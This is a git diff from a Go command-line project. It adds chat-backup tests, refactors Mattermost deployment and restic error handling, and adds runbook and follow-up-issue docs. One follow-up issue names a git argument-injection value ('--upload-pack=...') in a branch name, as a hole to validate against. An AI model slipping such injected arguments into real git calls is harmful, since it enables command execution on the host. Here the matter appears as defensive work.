+ require.NoError(t, cmd.Flags().Set("keep-hourly", "oops"))
+
+ _, err := parseRetentionPolicy(cmd)
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "int")
+}
+
+func TestRunBackupChats_RoutesSetup(t *testing.T) {
+ resetChatbackupFns(t)
+ cmd := newChatsTestCommand(t)
+ require.NoError(t, cmd.Flags().Set("setup", "true"))
+ require.NoError(t, cmd.Flags().Set("user", "henry"))
+
+ setupCalled := false
+ chatbackupSetupFn = func(rc *eos_io.RuntimeContext, config chatbackup.ScheduleConfig) (*chatbackup.ScheduleResult, error) {
+ setupCalled = true
+ assert.Equal(t, "henry", config.User)
+ return &chatbackup.ScheduleResult{RepoPath: "/tmp/repo", PasswordFile: "/tmp/pw"}, nil
+ }
+ chatbackupRunBackupFn = func(*eos_io.RuntimeContext, chatbackup.BackupConfig) (*chatbackup.BackupResult, error) {
+ return nil, fmt.Errorf("unexpected backup path")
+ }
+
+ err := runBackupChats(newChatsRuntimeContext(), cmd, nil)
+ require.NoError(t, err)
+ assert.True(t, setupCalled)
+}
+
+func TestRunBackupChats_MissingFlagsError(t *testing.T) {
+ resetChatbackupFns(t)
+ cmd := &cobra.Command{Use: "chats"}
+ err := runBackupChats(newChatsRuntimeContext(), cmd, nil)
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "dry-run")
+}
+
+func TestRunBackupChats_RoutesPrune(t *testing.T) {
+ resetChatbackupFns(t)
+ cmd := newChatsTestCommand(t)
+ require.NoError(t, cmd.Flags().Set("prune", "true"))
+ require.NoError(t, cmd.Flags().Set("user", "henry"))
+
+ pruneCalled := false
+ chatbackupRunPruneFn = func(rc *eos_io.RuntimeContext, config chatbackup.BackupConfig) error {
+ pruneCalled = true
+ assert.Equal(t, "henry", config.User)
+ return nil
+ }
+
+ err := runBackupChats(newChatsRuntimeContext(), cmd, nil)
+ require.NoError(t, err)
+ assert.True(t, pruneCalled)
+}
+
+func TestRunBackupChats_RoutesList(t *testing.T) {
+ resetChatbackupFns(t)
+ cmd := newChatsTestCommand(t)
+ require.NoError(t, cmd.Flags().Set("list", "true"))
+ require.NoError(t, cmd.Flags().Set("user", "henry"))
+
+ listCalled := false
+ chatbackupListSnapshotsFn = func(rc *eos_io.RuntimeContext, config chatbackup.BackupConfig) (string, error) {
+ listCalled = true
+ assert.Equal(t, "henry", config.User)
+ return "ID Time\n", nil
+ }
+
+ err := runBackupChats(newChatsRuntimeContext(), cmd, nil)
+ require.NoError(t, err)
+ assert.True(t, listCalled)
+}
+
+func TestRunBackupChats_RoutesBackup(t *testing.T) {
+ resetChatbackupFns(t)
+ cmd := newChatsTestCommand(t)
+ require.NoError(t, cmd.Flags().Set("user", "henry"))
+ require.NoError(t, cmd.Flags().Set("scan-dirs", "/opt,/srv"))
+ require.NoError(t, cmd.Flags().Set("verbose", "true"))
+
+ backupCalled := false
+ chatbackupRunBackupFn = func(rc *eos_io.RuntimeContext, config chatbackup.BackupConfig) (*chatbackup.BackupResult, error) {
+ backupCalled = true
+ assert.Equal(t, "henry", config.User)
+ assert.Equal(t, []string{"/opt", "/srv"}, config.ExtraScanDirs)
+ assert.True(t, config.Verbose)
+ return &chatbackup.BackupResult{}, nil
+ }
+
+ err := runBackupChats(newChatsRuntimeContext(), cmd, nil)
+ require.NoError(t, err)
+ assert.True(t, backupCalled)
+}
+
+func TestRunBackupChats_ValidationError(t *testing.T) {
+ resetChatbackupFns(t)
+ cmd := newChatsTestCommand(t)
+ require.NoError(t, cmd.Flags().Set("setup", "true"))
+ require.NoError(t, cmd.Flags().Set("prune", "true"))
+
+ err := runBackupChats(newChatsRuntimeContext(), cmd, nil)
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "mutually exclusive")
+}
+
+func TestRunBackupChats_MapDependencyError(t *testing.T) {
+ resetChatbackupFns(t)
+ cmd := newChatsTestCommand(t)
+ require.NoError(t, cmd.Flags().Set("user", "henry"))
+
+ chatbackupRunBackupFn = func(*eos_io.RuntimeContext, chatbackup.BackupConfig) (*chatbackup.BackupResult, error) {
+ return nil, fmt.Errorf("wrapped: %w", chatbackup.ErrResticNotInstalled)
+ }
+
+ err := runBackupChats(newChatsRuntimeContext(), cmd, nil)
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "restic")
+ assert.Equal(t, 1, eos_err.GetExitCode(err))
+}
+
+func TestRunBackupChats_MapRepoInitializationError(t *testing.T) {
+ resetChatbackupFns(t)
+ cmd := newChatsTestCommand(t)
+ require.NoError(t, cmd.Flags().Set("user", "henry"))
+
+ chatbackupRunBackupFn = func(*eos_io.RuntimeContext, chatbackup.BackupConfig) (*chatbackup.BackupResult, error) {
+ return nil, fmt.Errorf("wrapped: %w", chatbackup.ErrRepositoryNotInitialized)
+ }
+
+ err := runBackupChats(newChatsRuntimeContext(), cmd, nil)
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "--setup")
+ assert.Equal(t, 1, eos_err.GetExitCode(err))
+}
+
+func TestMapChatbackupError_UnknownPassThrough(t *testing.T) {
+ err := mapChatbackupError(newChatsRuntimeContext(), "backup", errors.New("boom"))
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "backup failed: boom")
+}
+
+func TestMapChatbackupError_BackupAlreadyRunning(t *testing.T) {
+ err := mapChatbackupError(newChatsRuntimeContext(), "backup", chatbackup.ErrBackupAlreadyRunning)
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "currently running")
+}
+
+func TestMapChatbackupError_Nil(t *testing.T) {
+ assert.NoError(t, mapChatbackupError(newChatsRuntimeContext(), "backup", nil))
+}
+
+func TestFormatResult(t *testing.T) {
+ out := FormatResult(&chatbackup.BackupResult{
+ SnapshotID: "abc123",
+ TotalDuration: "1.0s",
+ FilesNew: 1,
+ FilesChanged: 2,
+ FilesUnmodified: 3,
+ BytesAdded: 42,
+ ToolsFound: []string{"codex", "claude-code"},
+ })
+
+ assert.Contains(t, out, "abc123")
+ assert.Contains(t, out, "Files: 1 new, 2 changed, 3 unmodified")
+ assert.Contains(t, out, "Tools: codex, claude-code")
+}
+
+func TestRunSetup_MapsErrors(t *testing.T) {
+ resetChatbackupFns(t)
+ cmd := newChatsTestCommand(t)
+ logger := otelzap.Ctx(newChatsRuntimeContext().Ctx)
+
+ chatbackupSetupFn = func(*eos_io.RuntimeContext, chatbackup.ScheduleConfig) (*chatbackup.ScheduleResult, error) {
+ return nil, fmt.Errorf("wrapped: %w", chatbackup.ErrResticNotInstalled)
+ }
+
+ err := runSetup(newChatsRuntimeContext(), logger, cmd, "henry", chatbackup.DefaultRetentionPolicy(), false)
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "restic")
+}
+
+func TestRunSetup_MissingCronFlagsError(t *testing.T) {
+ resetChatbackupFns(t)
+ cmd := &cobra.Command{Use: "chats"}
+ logger := otelzap.Ctx(newChatsRuntimeContext().Ctx)
+
+ err := runSetup(newChatsRuntimeContext(), logger, cmd, "henry", chatbackup.DefaultRetentionPolicy(), false)
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "backup-cron")
+}
+
+func TestRunPrune_MapsErrors(t *testing.T) {
+ resetChatbackupFns(t)
+ logger := otelzap.Ctx(newChatsRuntimeContext().Ctx)
+ chatbackupRunPruneFn = func(*eos_io.RuntimeContext, chatbackup.BackupConfig) error {
+ return fmt.Errorf("wrapped: %w", chatbackup.ErrRepositoryNotInitialized)
+ }
+
+ err := runPrune(newChatsRuntimeContext(), logger, "henry", chatbackup.DefaultRetentionPolicy(), false)
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "--setup")
+}
+
+func TestRunList_MapsErrors(t *testing.T) {
+ resetChatbackupFns(t)
+ logger := otelzap.Ctx(newChatsRuntimeContext().Ctx)
+ chatbackupListSnapshotsFn = func(*eos_io.RuntimeContext, chatbackup.BackupConfig) (string, error) {
+ return "", fmt.Errorf("wrapped: %w", chatbackup.ErrResticNotInstalled)
+ }
+
+ err := runList(newChatsRuntimeContext(), logger, "henry")
+ require.Error(t, err)
+ assert.Contains(t, err.Error(), "restic")
+}
+
+func TestRunBackup_NoDataLogsAndSucceeds(t *testing.T) {
+ resetChatbackupFns(t)
+ logger := otelzap.Ctx(newChatsRuntimeContext().Ctx)
+ chatbackupRunBackupFn = func(*eos_io.RuntimeContext, chatbackup.BackupConfig) (*chatbackup.BackupResult, error) {
+ return &chatbackup.BackupResult{}, nil
+ }
+
+ err := runBackup(newChatsRuntimeContext(), logger, "henry", chatbackup.DefaultRetentionPolicy(), []string{"/opt"}, false, false)
+ require.NoError(t, err)
+}
+
+func TestRunBackup_DryRunBranch(t *testing.T) {
+ resetChatbackupFns(t)
+ logger := otelzap.Ctx(newChatsRuntimeContext().Ctx)
+ chatbackupRunBackupFn = func(*eos_io.RuntimeContext, chatbackup.BackupConfig) (*chatbackup.BackupResult, error) {
+ return &chatbackup.BackupResult{
+ ToolsFound: []string{"codex"},
+ PathsBackedUp: []string{"/tmp/path"},
+ PathsSkipped: []string{"/tmp/missing"},
+ }, nil
+ }
+
+ err := runBackup(newChatsRuntimeContext(), logger, "henry", chatbackup.DefaultRetentionPolicy(), []string{"/opt"}, true, false)
+ require.NoError(t, err)
+}
diff --git a/cmd/backup/quick.go b/cmd/backup/quick.go
index 47d767cb9..2274fbbf6 100644
--- a/cmd/backup/quick.go
+++ b/cmd/backup/quick.go
@@ -122,14 +122,13 @@ Restore:
if errors.Is(err, backup.ErrResticNotInstalled) {
logger.Info("terminal prompt:", zap.String("output",
"Restic is not installed. Install restic (e.g., sudo apt-get install restic) and rerun eos backup ."))
- userErr := eos_err.DependencyError("restic", "run quick backup", err)
- return eos_err.NewExpectedError(rc.Ctx, userErr)
+ return eos_err.DependencyError("restic", "run quick backup", err)
}
if errors.Is(err, backup.ErrRepositoryNotInitialized) {
logger.Info("terminal prompt:", zap.String("output",
"Restic repository is not initialized. Initialize it (e.g., eos backup create repository local --path /var/lib/eos/backups) and rerun the command."))
- return eos_err.NewExpectedError(rc.Ctx, err)
+ return fmt.Errorf("restic repository not initialized: %w", err)
}
logger.Error("Backup failed", zap.Error(err), zap.String("output", string(output)))
diff --git a/cmd/create/mattermost.go b/cmd/create/mattermost.go
index 054901a10..df360bfdd 100644
--- a/cmd/create/mattermost.go
+++ b/cmd/create/mattermost.go
@@ -1,78 +1,7 @@
// cmd/create/mattermost.go
//
-// # Mattermost Team Collaboration Platform Deployment
-//
-// This file implements CLI commands for deploying Mattermost using Eos's
-// infrastructure compiler pattern. It orchestrates the complete deployment
-// stack including container orchestration, service discovery, and secure
-// credential management.
-//
-// Eos Infrastructure Compiler Integration:
-// This deployment follows Eos's core philosophy of translating simple human
-// intent ("deploy Mattermost") into complex multi-system orchestration:
-// Human Intent → Eos CLI → → Terraform → Nomad → Mattermost
-//
-// Key Features:
-// - Complete Mattermost deployment with automatic configuration
-// - Automatic environment discovery (production/staging/development)
-// - Secure credential generation and Vault integration
-// - Container orchestration via Nomad with health checks
-// - Service discovery via Consul for scalability
-// - Persistent data storage with PostgreSQL backend
-// - Hecate two-layer reverse proxy integration
-// - SSL termination and authentication via Authentik
-//
-// Architecture Components:
-// - Nomad: Container orchestration and job scheduling
-// - Consul: Service discovery and health monitoring
-// - Vault: Secure credential storage and management
-// - PostgreSQL: Persistent data storage backend
-// - Nginx: Local reverse proxy for service routing
-// - Hecate: Two-layer reverse proxy (Hetzner Cloud + Local)
-//
-// Hecate Integration:
-// Follows the two-layer reverse proxy architecture:
-// Internet → Hetzner Cloud (Caddy + Authentik) → Local Infrastructure (Nginx + Mattermost)
-//
-// Layer 1 (Frontend - Hetzner Cloud):
-// - Caddy: SSL termination and automatic certificate management
-// - Authentik: Identity provider with SSO/SAML/OAuth2
-// - DNS: Automatic domain management
-//
-// Layer 2 (Backend - Local Infrastructure):
-// - Nginx: Local reverse proxy container
-// - Mattermost: Application container
-// - Consul: Service discovery (mattermost.service.consul)
-//
-// Available Commands:
-// - eos create mattermost # Basic deployment
-// - eos create mattermost --domain chat.example.com # Custom domain
-// - eos create mattermost --environment prod # Production configuration
-//
-// Security Features:
-// - Automatic secure credential generation
-// - Vault integration for secret management
-// - Role-based access control via Authentik
-// - TLS encryption end-to-end
-// - Network isolation via Nomad networking
-//
-// Usage Examples:
-//
-// # Basic deployment with automatic configuration
-// eos create mattermost
-//
-// # Production deployment with custom domain
-// eos create mattermost --domain chat.company.com --environment production
-//
-// # Development deployment with local access
-// eos create mattermost --environment development --local-only
-//
-// Integration Points:
-// - Vault: Secure storage of database credentials and API keys
-// - Consul: Service registration and health monitoring
-// - Nomad: Container lifecycle management and scaling
-// - PostgreSQL: Persistent data storage with automatic backups
-// - Hecate: Public access with authentication and SSL
+// Orchestration-only command for deploying Mattermost.
+// All business logic is in pkg/mattermost/install.go.
package create
import (
@@ -84,204 +13,115 @@ import (
"github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
"github.com/CodeMonkeyCybersecurity/eos/pkg/mattermost"
"github.com/CodeMonkeyCybersecurity/eos/pkg/secrets"
- "github.com/CodeMonkeyCybersecurity/eos/pkg/shared"
"github.com/spf13/cobra"
"github.com/uptrace/opentelemetry-go-extra/otelzap"
"go.uber.org/zap"
)
-// CreateMattermostCmd installs Mattermost team collaboration platform
+// CreateMattermostCmd installs Mattermost team collaboration platform.
var CreateMattermostCmd = &cobra.Command{
Use: "mattermost",
- Short: "Install Mattermost team collaboration platform using Nomad orchestration",
- Long: `Install Mattermost using the → Terraform → Nomad architecture.
+ Short: "Install Mattermost team collaboration platform",
+ Long: `Deploy Mattermost using Docker Compose with automatic configuration.
-This command provides a complete Mattermost deployment with automatic configuration:
-- Automatic environment discovery (production/staging/development)
-- Secure credential generation and storage (Vault//file)
-- Container orchestration via Nomad
-- Service discovery via Consul
-- Persistent data storage
-- Health monitoring and recovery
-- Production-ready configuration
-
-Mattermost is an open-source, self-hostable team collaboration platform with messaging,
-file sharing, search, and integrations designed for organizations.
+This command provides a complete Mattermost deployment:
+- Docker Compose orchestration (PostgreSQL + Mattermost)
+- Secure credential generation and Vault storage
+- Automatic environment discovery
+- Idempotent: safe to run multiple times
Examples:
- eos create mattermost # Deploy with automatic configuration
- eos create mattermost --database-password secret123 # Override database password
- eos create mattermost --port 8065 # Override port
- eos create mattermost --datacenter production # Override datacenter`,
+ eos create mattermost # Deploy with defaults
+ eos create mattermost --database-password mypass # Override DB password
+ eos create mattermost --port 8065 # Override port
+ eos create mattermost --dry-run # Preview without deploying`,
RunE: eos.Wrap(runCreateMattermost),
}
+func init() {
+ CreateCmd.AddCommand(CreateMattermostCmd)
+
+ CreateMattermostCmd.Flags().String("database-password", "", "Override automatic database password generation")
+ CreateMattermostCmd.Flags().IntP("port", "p", mattermost.DefaultPort, "Host port for Mattermost")
+ CreateMattermostCmd.Flags().Bool("dry-run", false, "Preview changes without applying")
+}
+
func runCreateMattermost(rc *eos_io.RuntimeContext, cmd *cobra.Command, args []string) error {
logger := otelzap.Ctx(rc.Ctx)
- // Check if running as root
if os.Geteuid() != 0 {
- return fmt.Errorf("this command must be run as root")
+ return fmt.Errorf("this command must be run as root (sudo eos create mattermost)")
}
- logger.Info("Starting Mattermost deployment with automatic configuration")
+ // Parse flags into config
+ cfg := mattermost.DefaultInstallConfig()
- // 1. Discover environment automatically
- envConfig, err := environment.DiscoverEnvironment(rc)
+ dryRun, err := cmd.Flags().GetBool("dry-run")
if err != nil {
- logger.Warn("Environment discovery failed, using defaults", zap.Error(err))
- // Continue with defaults rather than failing
- envConfig = &environment.EnvironmentConfig{
- Environment: "production",
- Datacenter: "dc1",
- Region: "us-east-1",
- VaultAddr: fmt.Sprintf("http://localhost:%d", shared.PortVault),
- }
+ return fmt.Errorf("parse --dry-run: %w", err)
}
+ cfg.DryRun = dryRun
- logger.Info("Environment discovered",
- zap.String("environment", envConfig.Environment),
- zap.String("datacenter", envConfig.Datacenter),
- zap.String("vault_addr", envConfig.VaultAddr))
-
- // 2. Check for manual overrides from flags
- if manualPassword, _ := cmd.Flags().GetString("database-password"); manualPassword != "" {
- logger.Info("Using manually provided database password")
- }
- if manualPort, _ := cmd.Flags().GetInt("port"); manualPort != 0 && manualPort != shared.PortMattermost {
- logger.Info("Using manually provided port", zap.Int("port", manualPort))
+ if cmd.Flags().Changed("port") {
+ port, err := cmd.Flags().GetInt("port")
+ if err != nil {
+ return fmt.Errorf("parse --port: %w", err)
+ }
+ cfg.Port = port
}
- // 3. Get or generate secrets automatically
- secretManager, err := secrets.NewManager(rc, envConfig)
- if err != nil {
- return fmt.Errorf("secret manager initialization failed: %w", err)
+ // Get database password: flag -> secrets manager -> auto-generate
+ if cmd.Flags().Changed("database-password") {
+ dbPass, err := cmd.Flags().GetString("database-password")
+ if err != nil {
+ return fmt.Errorf("parse --database-password: %w", err)
+ }
+ cfg.PostgresPassword = dbPass
+ logger.Info("Using database password from --database-password flag")
+ } else {
+ // Use secrets manager to generate/retrieve password
+ password, err := getOrGeneratePassword(rc, logger)
+ if err != nil {
+ logger.Warn("Secrets manager unavailable, password will be set from .env template",
+ zap.Error(err))
+ } else {
+ cfg.PostgresPassword = password
+ }
}
- requiredSecrets := map[string]secrets.SecretType{
- "database_password": secrets.SecretTypePassword,
- "file_public_key": secrets.SecretTypeAPIKey,
- "file_private_key": secrets.SecretTypeAPIKey,
- "invite_": secrets.SecretTypeToken,
- }
+ // Delegate all business logic to pkg/mattermost
+ return mattermost.Install(rc, cfg)
+}
- serviceSecrets, err := secretManager.EnsureServiceSecrets(rc.Ctx, "mattermost", requiredSecrets)
+// getOrGeneratePassword uses the secrets manager to get or generate the DB password.
+func getOrGeneratePassword(rc *eos_io.RuntimeContext, logger otelzap.LoggerWithCtx) (string, error) {
+ envConfig, err := environment.DiscoverEnvironment(rc)
if err != nil {
- return fmt.Errorf("secret generation failed: %w", err)
+ return "", fmt.Errorf("environment discovery failed: %w", err)
}
- // 4. Build configuration with discovered/generated values
- databasePassword := serviceSecrets.Secrets["database_password"].(string)
- filePublicKey := serviceSecrets.Secrets["file_public_key"].(string)
- filePrivateKey := serviceSecrets.Secrets["file_private_key"].(string)
- _ = "" // invite functionality placeholder serviceSecrets.Secrets["invite_"].(string)
-
- // Allow manual overrides
- if manualPassword, _ := cmd.Flags().GetString("database-password"); manualPassword != "" {
- databasePassword = manualPassword
- }
-
- port := envConfig.Services.DefaultPorts["mattermost"]
- if manualPort, _ := cmd.Flags().GetInt("port"); manualPort != 0 {
- port = manualPort
- }
-
- resourceConfig := envConfig.Services.Resources[envConfig.Environment]
-
- Config := map[string]interface{}{
- "nomad_service": map[string]interface{}{
- "name": "mattermost",
- "environment": envConfig.Environment,
- "config": map[string]interface{}{
- "database_password": databasePassword,
- "file_public_key": filePublicKey,
- "file_private_key": filePrivateKey,
- "port": port,
- "datacenter": envConfig.Datacenter,
- "data_path": envConfig.Services.DataPath + "/mattermost",
- "cpu": resourceConfig.CPU,
- "memory": resourceConfig.Memory,
- "replicas": resourceConfig.Replicas,
- },
- },
+ secretManager, err := secrets.NewManager(rc, envConfig)
+ if err != nil {
+ return "", fmt.Errorf("secret manager init failed: %w", err)
}
- // 5. Deploy with automatically configured values
- logger.Info("Deploying Mattermost via → Terraform → Nomad",
- zap.String("environment", envConfig.Environment),
- zap.String("datacenter", envConfig.Datacenter),
- zap.Int("port", port),
- zap.Int("cpu", resourceConfig.CPU),
- zap.Int("memory", resourceConfig.Memory),
- zap.Int("replicas", resourceConfig.Replicas))
-
- // Deploy using Nomad orchestration
- mattermostConfig := &mattermost.Config{
- PostgresUser: "mattermost",
- PostgresPassword: databasePassword,
- PostgresDB: "mattermost",
- PostgresHost: "mattermost-postgres.service.consul",
- PostgresPort: 5432,
- Port: port,
- Host: "0.0.0.0",
- Domain: fmt.Sprintf("mattermost.%s.local", envConfig.Environment),
- Protocol: "https",
- Datacenter: envConfig.Datacenter,
- Environment: envConfig.Environment,
- DataPath: envConfig.Services.DataPath + "/mattermost",
- Replicas: resourceConfig.Replicas,
- CPU: resourceConfig.CPU,
- Memory: resourceConfig.Memory,
- NomadAddr: "http://localhost:4646",
- VaultAddr: fmt.Sprintf("http://localhost:%d", shared.PortVault),
- FilePublicKey: filePublicKey,
- FilePrivateKey: filePrivateKey,
- SupportEmail: "support@example.com",
- Timezone: "UTC",
+ requiredSecrets := map[string]secrets.SecretType{
+ "database_password": secrets.SecretTypePassword,
}
- // Create Mattermost manager
- mattermostManager, err := mattermost.NewManager(rc, mattermostConfig)
+ serviceSecrets, err := secretManager.EnsureServiceSecrets(rc.Ctx, mattermost.ServiceName, requiredSecrets)
if err != nil {
- return fmt.Errorf("failed to create Mattermost manager: %w", err)
+ return "", fmt.Errorf("secret generation failed: %w", err)
}
- // Deploy Mattermost using HashiCorp stack
- if err := mattermostManager.Deploy(rc.Ctx); err != nil {
- return fmt.Errorf("mattermost deployment failed: %w", err)
+ password, ok := serviceSecrets.Secrets["database_password"].(string)
+ if !ok || password == "" {
+ return "", fmt.Errorf("generated password is empty")
}
- _ = Config // Keep for backward compatibility
-
- // 6. Display success information with generated credentials
- logger.Info("Mattermost deployment completed successfully",
- zap.String("management", " → Terraform → Nomad"),
- zap.String("environment", envConfig.Environment),
- zap.String("secret_backend", "Vault"))
-
- logger.Info("Storing deployment secrets in secret manager",
- zap.String("backend", "Vault"))
-
- logger.Info("Mattermost is now available",
- zap.String("web_ui", fmt.Sprintf("http://localhost:%d", port)),
- zap.String("database_password", databasePassword),
- zap.String("consul_service", "mattermost.service.consul"))
+ logger.Info("Database password managed by secrets manager",
+ zap.String("backend", serviceSecrets.Backend))
- logger.Info("Configuration automatically managed",
- zap.String("environment_discovery", "bootstrap//cloud"),
- zap.String("secret_storage", "Vault"),
- zap.String("resource_allocation", envConfig.Environment))
-
- return nil
-}
-
-func init() {
- CreateCmd.AddCommand(CreateMattermostCmd)
-
- // Optional override flags - everything is automatic by default
- CreateMattermostCmd.Flags().String("database-password", "", "Override automatic database password generation")
- CreateMattermostCmd.Flags().IntP("port", "p", 0, "Override automatic port assignment")
- CreateMattermostCmd.Flags().StringP("datacenter", "d", "", "Override automatic datacenter detection")
- CreateMattermostCmd.Flags().StringP("environment", "e", "", "Override automatic environment detection")
+ return password, nil
}
diff --git a/docs/backup-observability-runbook.md b/docs/backup-observability-runbook.md
index 5ccab162b..758d99d5a 100644
--- a/docs/backup-observability-runbook.md
+++ b/docs/backup-observability-runbook.md
@@ -7,10 +7,20 @@ Backup telemetry is exported via Go `expvar` at `/debug/vars`.
Key maps:
- `backup_repository_resolution_total`
+- `backup_repository_resolution_by_source_total`
+- `backup_repository_resolution_by_outcome_total`
- `backup_config_load_total`
+- `backup_config_load_by_source_total`
+- `backup_config_load_by_outcome_total`
- `backup_config_source_total`
+- `backup_config_source_by_source_total`
+- `backup_config_source_by_outcome_total`
- `backup_password_source_total`
+- `backup_password_source_by_source_total`
+- `backup_password_source_by_outcome_total`
- `backup_hook_decision_total`
+- `backup_hook_decision_by_source_total`
+- `backup_hook_decision_by_outcome_total`
## High-Signal Keys
@@ -27,6 +37,9 @@ Credential source health:
- `backup_password_source_total.vault_failure`
- `backup_password_source_total.repo_env_success`
- `backup_password_source_total.secrets_env_success`
+- `backup_password_source_by_source_total.vault`
+- `backup_password_source_by_outcome_total.failure`
+- `backup_password_source_by_outcome_total.success`
Hook policy enforcement:
@@ -34,13 +47,14 @@ Hook policy enforcement:
- `backup_hook_decision_total.deny_not_allowlisted_failure`
- `backup_hook_decision_total.deny_bad_arguments_failure`
- `backup_hook_decision_total.disabled_failure`
+- `backup_hook_decision_by_source_total.deny_not_allowlisted`
+- `backup_hook_decision_by_outcome_total.failure`
## Recommended Alerts
- Config access regression:
Trigger if `permission_denied_failure` increases over a 5-minute window.
- Secret hygiene regression:
- Trigger if `repo_env_success` or `secrets_env_success` grows faster than `vault_success`.
+ Trigger if `backup_password_source_by_outcome_total.failure` rises above 5% of total outcomes.
- Hook policy pressure:
- Trigger if `deny_not_allowlisted_failure` spikes and `allowlist_execute_success` drops.
-
+ Trigger if `backup_hook_decision_by_outcome_total.failure` spikes while execution volume is stable.
diff --git a/docs/development/governance-propagation-follow-up-issues.md b/docs/development/governance-propagation-follow-up-issues.md
new file mode 100644
index 000000000..e2901590b
--- /dev/null
+++ b/docs/development/governance-propagation-follow-up-issues.md
@@ -0,0 +1,17 @@
+# Governance Propagation Follow-up Issues
+
+## Issue 1: Replace temporary symlink compatibility with upstream checker path abstraction
+
+Problem: The local wrapper still creates a temporary `third_party/prompts` symlink when the submodule lives at `prompts/` because the upstream checker hard-codes `third_party/prompts/` references.
+
+Why it matters: The wrapper is now idempotent and covered, but the symlink is still compatibility glue rather than a first-class contract.
+
+Next step: Update the upstream checker in `prompts/scripts/check-governance.sh` to accept a prompts directory override and consume that from the wrapper.
+
+## Issue 2: Promote shell coverage reporting to a first-class published artifact
+
+Problem: The repo now computes shell coverage during `ci:debug`, but the result is only printed in logs and kept in the local `outputs/` tree.
+
+Why it matters: Historical coverage drift is harder to track when the value is not uploaded or summarized in a dedicated report artifact.
+
+Next step: Publish `outputs/ci/governance-propagation-coverage/coverage.json` as a workflow artifact and add trend reporting if the team wants longer-lived observability.
diff --git a/docs/development/prompts-submodule-report-schema-v2.md b/docs/development/prompts-submodule-report-schema-v2.md
new file mode 100644
index 000000000..71a215560
--- /dev/null
+++ b/docs/development/prompts-submodule-report-schema-v2.md
@@ -0,0 +1,43 @@
+# Prompts Submodule Report Schema Migration Guide
+
+## Change
+
+The prompts-submodule governance and freshness wrappers now emit report artifacts with `schema_version: "2"` and `run_id`.
+
+Affected report paths:
+
+- `outputs/ci/submodule-freshness/report.json`
+- `outputs/ci/governance/report.json`
+- `outputs/ci/pre-commit/report.json`
+
+## Why
+
+Versioned reports let CI alerts and downstream tooling evolve without guessing field shape from ad hoc JSON. Version 2 adds:
+
+- `schema_version`
+- `run_id`
+- `action`
+
+## Compatibility
+
+Version 1 consumers that only read `status`, `outcome`, `message`, or `exit_code` continue to work because those fields are unchanged.
+
+## Migration
+
+1. Prefer checking `schema_version` before using optional fields.
+2. Treat missing `schema_version` as version 1.
+3. Use `action` when the same report family can emit multiple modes.
+4. Use `run_id` to correlate shell logs with the matching artifact.
+
+## Example
+
+```json
+{
+ "schema_version": "2",
+ "run_id": "20260312Z-12345",
+ "kind": "governance",
+ "action": "governance",
+ "status": "pass",
+ "outcome": "pass_checked_via_override"
+}
+```
diff --git a/docs/development/self-update-follow-up-issues-2026-03-11.md b/docs/development/self-update-follow-up-issues-2026-03-11.md
new file mode 100644
index 000000000..a095c2719
--- /dev/null
+++ b/docs/development/self-update-follow-up-issues-2026-03-11.md
@@ -0,0 +1,79 @@
+*Last Updated: 2026-03-11*
+
+# Self-Update Follow-Up Issues (2026-03-11)
+
+## P2 - Important
+
+### 1. Reduce disk space checks from 4 to 2
+
+**Problem**: `updater_enhanced.go` runs disk space checks at 4 points (pre-flight, pre-build, pre-install, pre-Go-install). The pre-build and pre-install checks are redundant since the binary size is known by then.
+
+**Root cause**: Defensive coding during initial implementation; no consolidation pass.
+
+**Next step**: Keep pre-flight (catches obvious issues early) and pre-Go-install (different partition may apply). Remove pre-build and pre-install checks.
+
+### 2. Ownership normalization runs twice on success
+
+**Problem**: `normalizeOwnership()` is called both in the success path and in rollback cleanup. On a successful update, the success-path call is sufficient.
+
+**Root cause**: Belt-and-suspenders approach; rollback path added normalization without checking if it was already done.
+
+**Next step**: Gate the rollback normalization on `transaction.RolledBack == true` to avoid redundant work.
+
+### 3. PullOptions named presets
+
+**Problem**: `PullOptions` has 6+ fields, and callers construct them inline with magic combinations (e.g., self-update uses `{Autostash: true, Interactive: true, TrustPolicy: Strict}` while CI uses different settings).
+
+**Root cause**: Organic growth of options without a preset layer.
+
+**Next step**: Add `PullOptions.SelfUpdate()`, `PullOptions.CI()`, `PullOptions.Interactive()` constructors that encode tested defaults.
+
+### 4. vaultInsecureAuditLogPath is a package-level var
+
+**Problem**: `pkg/vault/phase2_env_setup.go` uses a package-level `var` for the audit log path, swapped in tests. This is a test-only seam that weakens production code encapsulation.
+
+**Root cause**: Needed testability without refactoring to dependency injection.
+
+**Next step**: Refactor to pass the audit path via a config struct or function parameter, removing the package-level var.
+
+## P3 - Recommended
+
+### 5. getLatestGoVersion shells out to curl
+
+**Problem**: `updater_enhanced.go` uses `exec.Command("curl", ...)` to fetch the latest Go version from `go.dev`. This bypasses Go's `net/http` client, losing retry logic, timeout control, and proxy support.
+
+**Root cause**: Quick implementation; curl was the fastest path to a working prototype.
+
+**Next step**: Replace with `http.Client` call using the project's standard HTTP patterns (timeouts, retries, user-agent).
+
+### 6. Go install is non-atomic (rm -rf then extract)
+
+**Problem**: The Go toolchain install removes `/usr/local/go` then extracts the new tarball. A crash between rm and extract leaves the system without a Go compiler.
+
+**Root cause**: Following the official Go install docs verbatim (`rm -rf /usr/local/go && tar -C /usr/local -xzf ...`).
+
+**Next step**: Extract to a temp directory first, then `os.Rename` the old dir to `.bak`, rename new dir into place, and only remove `.bak` on success.
+
+### 7. fetchRemoteBranch doesn't validate branch name
+
+**Problem**: The branch name passed to `git fetch origin ` is not validated against injection (e.g., `--upload-pack=...`).
+
+**Root cause**: Branch name comes from internal code (not user input), so validation was deferred.
+
+**Next step**: Add `validateBranchName()` that rejects names starting with `-` or containing shell metacharacters. Defense in depth.
+
+### 8. First-class Vault --force-insecure CLI flag
+
+**Problem**: `pkg/vault/phase2_env_setup.go` relies on env var `Eos_ALLOW_INSECURE_VAULT` for non-interactive insecure fallback rather than a first-class CLI flag.
+
+**Root cause**: Env var was the minimal viable approach for CI/scripted usage.
+
